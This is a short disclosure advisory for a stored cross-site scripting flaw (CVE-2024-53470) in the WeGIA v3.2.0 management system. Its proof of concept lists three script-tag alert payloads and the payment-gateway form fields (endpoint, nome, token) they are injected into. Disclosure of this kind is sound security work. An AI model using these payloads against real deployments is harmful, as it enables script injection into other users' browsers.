CVE-2024-53470:Stored XSS in gateway_pagamento.php function

Vendor

WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions.

Affected Product Code Base

WeGIA - v3.2.0

Vulnerability Description

A stored Cross-Site Scripting (XSS) vulnerability was identified in the WeGIA application. This vulnerability allows unauthorized scripts to be executed within the user’s browser context.

POC

File: gateway_pagamento.php

Payload: <script>alert('Alert: XSS');</script>

Endpoint: id="plataforma-endpoint" name="endpoint"

File: gateway_pagamento.php

Payload: <script>alert('Alert: XSS2');</script>

Endpoint: id="plataforma-nome" name="nome"

File: gateway_pagamento.php

Payload: <script>alert('Alert: XSS3');</script>

Endpoint: id="plataforma-chave" name="token"

Reference

https://github.com/nilsonLazarin/WeGIA/issues/789

https://www.wegia.org

https://github.com/nilsonmori/WeGIA

Discoverer

Natan Maia Morette and Diego Cardoso Borda Castro, Nov 2024.